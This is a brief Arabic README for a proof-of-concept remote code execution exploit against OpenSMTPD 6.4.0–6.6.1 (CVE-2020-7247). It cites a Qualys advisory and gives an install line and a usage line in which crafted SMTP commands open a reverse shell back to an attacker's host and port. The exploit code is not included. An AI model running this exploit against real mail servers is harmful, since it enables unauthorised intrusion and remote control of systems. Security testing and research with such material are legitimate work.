
استغلال إثبات مفهوم لتنفيذ التعليمات البرمجية عن بُعد يستهدف إصدارات OpenSMTPD من 6.4.0 إلى 6.6.1، ويوفر صدفة عكسية عبر أوامر SMTP مصممة بعناية.
استغلال PoC لـ OpenSMTPD 6.4.0 < 6.6.1 - تنفيذ تعليمات برمجية عن بُعد، كتب بواسطة f4T1H، مستوحى من QTranspose.
المرجع: https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt
pip3 install pwntools
python3 exploit.py <RHOST> <RPORT> <recipient_mail> <LHOST> <LPORT>
